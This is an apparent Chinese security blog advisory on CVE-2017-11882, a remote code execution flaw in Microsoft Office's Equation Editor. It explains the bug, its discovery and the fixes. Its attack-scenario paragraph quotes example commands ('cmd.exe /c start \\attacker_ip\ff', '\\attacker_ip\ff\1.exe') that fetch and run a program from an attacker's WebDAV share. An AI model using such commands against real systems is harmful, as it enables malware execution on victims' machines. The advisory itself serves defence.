【四维创智】-专研智能,智汇安全-网络攻防-渗透测试-web安全-无线安全-内网安全 微软Office曝潜伏17年之久的远程代码执行漏洞,可波及所有Office版本! – 【四维创智】

微软Office曝潜伏17年之久的远程代码执行漏洞,可波及所有Office版本!

1月 8,2018by admin

2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于在一个名为微软公式编辑器的Office可执行文件中悄然发现了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。
漏洞信息
该漏洞由Embedi公司研究员发现,漏洞可导致远程代码执行、未授权认证绕过、无需用户交互的远程恶意程序植入。目前漏洞编号CVE-2017-11882,主要漏洞部件为Office中的自带公式编辑器EQNEDT32.EXE。Microsoft公式编辑器默认安装在Office套件中。该应用程序用于在Microsoft Word文档中插入和编辑复杂方程作为对象链接和嵌入(OLE)项目。
Embedi的进一步分析表明,EQNEDT32.EXE是不安全的,因为执行时,它运行在Office之外,没有受益于许多Microsoft Windows 10和Office安全特性,如Control Flow Guard。
Microsoft将CVE-2017-11882描述为Microsoft Office内存损坏漏洞。 “利用此漏洞需要用户使用受影响的Microsoft Office或Microsoft WordPad软件版本打开特制文件。在电子邮件攻击情形中,攻击者可以通过向用户发送特制文件并说服用户打开文件来利用此漏洞。“
漏洞技术分析
CVE-2017-11882漏洞POC样本分析: http://www.freebuf.com/vuls/154462.html
可能的攻击场景
Embedi研究者列举了以下几种该漏洞的可攻击利用场景:当插入一些OLE(对象链接嵌入)实体时,可能会触发该漏洞,实现一些恶意命令的执行,如向某个攻击者架设网站下载执行恶意程序等。 最直接有效的漏洞利用方式就是,访问攻击者架设或控制的WebDAV服务器,并执行其中的运行程序。 不过,攻击者还能利用该漏洞执行cmd.exe /c start \\attacker_ip\ff类似恶意命令,配合入侵或启动WebClient服务。 另外,攻击者还能使用诸如\\attacker_ip\ff\1.exe的命令向受害者系统中执行恶意程序,恶意程序的启动机制与\\live.sysinternals.com\tools service方式类似。
缓解和修复措施
在11月的补丁修复周期中,微软针对该漏洞修改了EQNEDT32.EXE组件的内存处理机制,并发布了多个漏洞补丁更新,强烈建议用户及时进行下载更新。 除此之外,Embedi建议公司禁用EQNEDT32.EXE在Windows注册表,以防止进一步利用。 研究人员写道:“由于该组件具有许多安全问题,而且其中包含的漏洞可以被轻易利用,所以用户确保安全的最佳选择是禁止在Windows注册表中注册该组件。